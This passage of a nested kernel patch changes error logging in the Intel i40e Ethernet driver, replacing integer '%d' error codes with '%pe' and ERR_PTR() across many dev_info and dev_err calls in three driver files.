++			 "add new vsi failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -6518,8 +6518,8 @@ static int i40e_validate_and_set_switch_mode(struct i40e_vsi *vsi)
+ 					mode, NULL);
+ 	if (ret && hw->aq.asq_last_status != I40E_AQ_RC_ESRCH)
+ 		dev_err(&pf->pdev->dev,
+-			"couldn't set switch config bits, err %d aq_err %s\n",
+-			ret,
++			"couldn't set switch config bits, err %pe aq_err %s\n",
++			ERR_PTR(ret),
+ 			i40e_aq_str(hw,
+ 				    hw->aq.asq_last_status));
+ 
+@@ -6719,8 +6719,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 						   &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "VEB bw config failed, err %d aq_err %s\n",
+-			 ret,
++			 "VEB bw config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6729,8 +6729,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed getting veb bw config, err %d aq_err %s\n",
+-			 ret,
++			 "Failed getting veb bw config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -6813,8 +6813,8 @@ static int i40e_resume_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_resume_port_tx(hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Resume Port Tx failed, err %d aq_err %s\n",
+-			  ret,
++			 "Resume Port Tx failed, err %pe aq_err %s\n",
++			  ERR_PTR(ret),
+ 			  i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6838,8 +6838,8 @@ static int i40e_suspend_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_suspend_port_tx(hw, pf->mac_seid, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Suspend Port Tx failed, err %d aq_err %s\n",
+-			 ret,
++			 "Suspend Port Tx failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6878,8 +6878,8 @@ static int i40e_hw_set_dcb_config(struct i40e_pf *pf,
+ 	ret = i40e_set_dcb_config(&pf->hw);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Set DCB Config failed, err %d aq_err %s\n",
+-			 ret,
++			 "Set DCB Config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6995,8 +6995,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 		 i40e_aqc_opc_modify_switching_comp_ets, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Modify Port ETS failed, err %d aq_err %s\n",
+-			 ret,
++			 "Modify Port ETS failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7033,8 +7033,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 	ret = i40e_aq_dcb_updated(&pf->hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "DCB Updated failed, err %d aq_err %s\n",
+-			 ret,
++			 "DCB Updated failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7117,8 +7117,8 @@ int i40e_dcb_sw_default_config(struct i40e_pf *pf)
+ 		 i40e_aqc_opc_enable_switching_comp_ets, NULL);
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Enable Port ETS failed, err %d aq_err %s\n",
+-			 err,
++			 "Enable Port ETS failed, err %pe aq_err %s\n",
++			 ERR_PTR(err),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		err = -ENOENT;
+ 		goto out;
+@@ -7197,8 +7197,8 @@ static int i40e_init_pf_dcb(struct i40e_pf *pf)
+ 		pf->flags |= I40E_FLAG_DISABLE_FW_LLDP;
+ 	} else {
+ 		dev_info(&pf->pdev->dev,
+-			 "Query for DCB configuration failed, err %d aq_err %s\n",
+-			 err,
++			 "Query for DCB configuration failed, err %pe aq_err %s\n",
++			 ERR_PTR(err),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -7436,8 +7436,8 @@ static int i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %d last_status =  %s\n",
+-			err,
++			"failed to get phy cap., ret =  %pe last_status =  %s\n",
++			ERR_PTR(err),
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7448,8 +7448,8 @@ static int i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %d last_status =  %s\n",
+-			err,
++			"failed to get phy cap., ret =  %pe last_status =  %s\n",
++			ERR_PTR(err),
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7493,8 +7493,8 @@ static int i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"set phy config ret =  %d last_status =  %s\n",
+-			err,
++			"set phy config ret =  %pe last_status =  %s\n",
++			ERR_PTR(err),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7834,8 +7834,8 @@ static int i40e_fwd_ring_up(struct i40e_vsi *vsi, struct net_device *vdev,
+ 			rx_ring->netdev = NULL;
+ 		}
+ 		dev_info(&pf->pdev->dev,
+-			 "Error adding mac filter on macvlan err %d, aq_err %s\n",
+-			  ret,
++			 "Error adding mac filter on macvlan err %pe, aq_err %s\n",
++			  ERR_PTR(ret),
+ 			  i40e_aq_str(hw, aq_err));
+ 		netdev_err(vdev, "L2fwd offload disabled to L2 filter error\n");
+ 	}
+@@ -7907,8 +7907,8 @@ static int i40e_setup_macvlans(struct i40e_vsi *vsi, u16 macvlan_cnt, u16 qcnt,
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %d aq_err %s\n",
+-			 ret,
++			 "Update vsi tc config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -8123,8 +8123,8 @@ static void i40e_fwd_del(struct net_device *netdev, void *vdev)
+ 				ch->fwd = NULL;
+ 			} else {
+ 				dev_info(&pf->pdev->dev,
+-					 "Error deleting mac filter on macvlan err %d, aq_err %s\n",
+-					  ret,
++					 "Error deleting mac filter on macvlan err %pe, aq_err %s\n",
++					  ERR_PTR(ret),
+ 					  i40e_aq_str(hw, aq_err));
+ 			}
+ 			break;
+@@ -8875,7 +8875,8 @@ static int i40e_delete_clsflower(struct i40e_vsi *vsi,
+ 	kfree(filter);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"Failed to delete cloud filter, err %d\n", err);
++			"Failed to delete cloud filter, err %pe\n",
++			ERR_PTR(err));
+ 		return i40e_aq_rc_to_posix(err, pf->hw.aq.asq_last_status);
+ 	}
+ 
+@@ -9437,8 +9438,8 @@ static int i40e_handle_lldp_event(struct i40e_pf *pf,
+ 			pf->flags &= ~I40E_FLAG_DCB_CAPABLE;
+ 		} else {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying DCB configuration data from firmware, err %d aq_err %s\n",
+-				 ret,
++				 "Failed querying DCB configuration data from firmware, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+@@ -10264,8 +10265,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get PF vsi config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10276,8 +10277,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %d aq_err %s\n",
+-			 ret,
++			 "update vsi switch failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10300,8 +10301,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get PF vsi config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10312,8 +10313,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %d aq_err %s\n",
+-			 ret,
++			 "update vsi switch failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10457,8 +10458,8 @@ static int i40e_get_capabilities(struct i40e_pf *pf,
+ 			buf_len = data_size;
+ 		} else if (pf->hw.aq.asq_last_status != I40E_AQ_RC_OK || err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "capability discovery failed, err %d aq_err %s\n",
+-				 err,
++				 "capability discovery failed, err %pe aq_err %s\n",
++				 ERR_PTR(err),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENODEV;
+@@ -10595,8 +10596,8 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ 
+ 		if (ret) {
+ 			dev_dbg(&pf->pdev->dev,
+-				"Failed to rebuild cloud filter, err %d aq_err %s\n",
+-				ret,
++				"Failed to rebuild cloud filter, err %pe aq_err %s\n",
++				ERR_PTR(ret),
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -10836,8 +10837,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	/* rebuild the basics for the AdminQ, HMC, and initial HW switch */
+ 	ret = i40e_init_adminq(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %d aq_err %s\n",
+-			 ret,
++		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto clear_recovery;
+ 	}
+@@ -10948,8 +10949,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (ret)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
+-			 ret,
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Rebuild the VSIs and VEBs that existed before reset.
+@@ -11052,8 +11053,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 		msleep(75);
+ 		ret = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (ret)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
+-				 ret,
++			dev_info(&pf->pdev->dev, "link restart failed, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -11084,9 +11085,9 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	ret = i40e_set_promiscuous(pf, pf->cur_promisc);
+ 	if (ret)
+ 		dev_warn(&pf->pdev->dev,
+-			 "Failed to restore promiscuous setting: %s, err %d aq_err %s\n",
++			 "Failed to restore promiscuous setting: %s, err %pe aq_err %s\n",
+ 			 pf->cur_promisc ? "on" : "off",
+-			 ret,
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	i40e_reset_all_vfs(pf, true);
+@@ -12220,8 +12221,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 			(struct i40e_aqc_get_set_rss_key_data *)seed);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS key, err %d aq_err %s\n",
+-				 ret,
++				 "Cannot get RSS key, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12234,8 +12235,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_get_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS lut, err %d aq_err %s\n",
+-				 ret,
++				 "Cannot get RSS lut, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12575,8 +12576,8 @@ int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for read access, err %d aq_err %s\n",
+-			 ret,
++			 "Cannot acquire NVM for read access, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12592,8 +12593,8 @@ int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "NVM read error, err %d aq_err %s\n",
+-			 ret,
++		dev_info(&pf->pdev->dev, "NVM read error, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12606,8 +12607,8 @@ int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for write access, err %d aq_err %s\n",
+-			 ret,
++			 "Cannot acquire NVM for write access, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12626,8 +12627,8 @@ int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret)
+ 		dev_info(&pf->pdev->dev,
+-			 "BW settings NOT SAVED, err %d aq_err %s\n",
+-			 ret,
++			 "BW settings NOT SAVED, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ bw_commit_out:
+ 
+@@ -12681,8 +12682,8 @@ static bool i40e_is_total_port_shutdown_enabled(struct i40e_pf *pf)
+ 
+ err_nvm:
+ 	dev_warn(&pf->pdev->dev,
+-		 "total-port-shutdown feature is off due to read nvm error: %d\n",
+-		 read_status);
++		 "total-port-shutdown feature is off due to read nvm error: %pe\n",
++		 ERR_PTR(read_status));
+ 	return ret;
+ }
+ 
+@@ -13009,8 +13010,8 @@ static int i40e_udp_tunnel_set_port(struct net_device *netdev,
+ 	ret = i40e_aq_add_udp_tunnel(hw, ntohs(ti->port), type, &filter_index,
+ 				     NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "add UDP port failed, err %d aq_err %s\n",
+-			    ret,
++		netdev_info(netdev, "add UDP port failed, err %pe aq_err %s\n",
++			    ERR_PTR(ret),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13029,8 +13030,8 @@ static int i40e_udp_tunnel_unset_port(struct net_device *netdev,
+ 
+ 	ret = i40e_aq_del_udp_tunnel(hw, ti->hw_priv, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "delete UDP port failed, err %d aq_err %s\n",
+-			    ret,
++		netdev_info(netdev, "delete UDP port failed, err %pe aq_err %s\n",
++			    ERR_PTR(ret),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13919,8 +13920,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't get PF vsi config, err %d aq_err %s\n",
+-				 ret,
++				 "couldn't get PF vsi config, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENOENT;
+@@ -13969,8 +13970,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 			ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 			if (ret) {
+ 				dev_info(&pf->pdev->dev,
+-					 "update vsi failed, err %d aq_err %s\n",
+-					 ret,
++					 "update vsi failed, err %pe aq_err %s\n",
++					 ERR_PTR(ret),
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 				ret = -ENOENT;
+@@ -13992,9 +13993,9 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 				 * message and continue
+ 				 */
+ 				dev_info(&pf->pdev->dev,
+-					 "failed to configure TCs for main VSI tc_map 0x%08x, err %d aq_err %s\n",
++					 "failed to configure TCs for main VSI tc_map 0x%08x, err %pe aq_err %s\n",
+ 					 enabled_tc,
+-					 ret,
++					 ERR_PTR(ret),
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 			}
+@@ -14088,8 +14089,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 		if (ret) {
+ 			dev_info(&vsi->back->pdev->dev,
+-				 "add vsi failed, err %d aq_err %s\n",
+-				 ret,
++				 "add vsi failed, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			ret = -ENOENT;
+@@ -14120,8 +14121,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get vsi bw info, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get vsi bw info, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* VSI is already added so not tearing that up */
+ 		ret = 0;
+@@ -14567,8 +14568,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						  &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw config failed, err %d aq_err %s\n",
+-			 ret,
++			 "query veb bw config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14577,8 +14578,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						   &ets_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw ets config failed, err %d aq_err %s\n",
+-			 ret,
++			 "query veb bw ets config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14774,8 +14775,8 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 	/* get a VEB from the hardware */
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't add VEB, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't add VEB, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+@@ -14785,16 +14786,16 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 					 &veb->stats_idx, NULL, NULL, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB statistics idx, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get VEB statistics idx, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB bw info, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get VEB bw info, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		i40e_aq_delete_element(&pf->hw, veb->seid, NULL);
+ 		return -ENOENT;
+@@ -15050,8 +15051,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 	ret = i40e_fetch_switch_configuration(pf, false);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't fetch switch config, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't fetch switch config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -15077,8 +15078,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 						NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %d aq_err %s\n",
+-				 ret,
++				 "couldn't set switch config bits, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -15984,8 +15985,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (err)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
+-			 err,
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %pe aq_err %s\n",
++			 ERR_PTR(err),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Reconfigure hardware for allowing smaller MSS in the case
+@@ -16003,8 +16004,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		msleep(75);
+ 		err = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (err)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
+-				 err,
++			dev_info(&pf->pdev->dev, "link restart failed, err %pe aq_err %s\n",
++				 ERR_PTR(err),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -16136,8 +16137,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the requested speeds from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, false, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %d last_status =  %s\n",
+-			err,
++		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %pe last_status =  %s\n",
++			ERR_PTR(err),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	pf->hw.phy.link_info.requested_speeds = abilities.link_speed;
+ 
+@@ -16147,8 +16148,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the supported phy types from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, true, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %d last_status =  %s\n",
+-			err,
++		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %pe last_status =  %s\n",
++			ERR_PTR(err),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* make sure the MFS hasn't been set lower than the default */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_nvm.c b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+index 779ba907009a5..f99c1f7fec406 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_nvm.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+@@ -1429,8 +1429,8 @@ static int i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+ 				       buff_size, &cmd_details);
+ 	if (status) {
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "%s err %d aq_err %s\n",
+-			   __func__, status,
++			   "%s err %pe aq_err %s\n",
++			   __func__, ERR_PTR(status),
+ 			   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		*perrno = i40e_aq_rc_to_posix(status, hw->aq.asq_last_status);
+ 		return status;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index 547e67d9470b7..cb925baf72ce0 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -1264,9 +1264,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %pe aq_err %s\n",
+ 				vf->vf_id,
+-				aq_ret,
++				ERR_PTR(aq_ret),
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			return aq_ret;
+@@ -1280,9 +1280,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %pe aq_err %s\n",
+ 				vf->vf_id,
+-				aq_ret,
++				ERR_PTR(aq_ret),
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 		}
+ 
+@@ -1297,9 +1297,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %pe aq_err %s\n",
+ 				vf->vf_id,
+-				aq_ret,
++				ERR_PTR(aq_ret),
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -1313,9 +1313,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
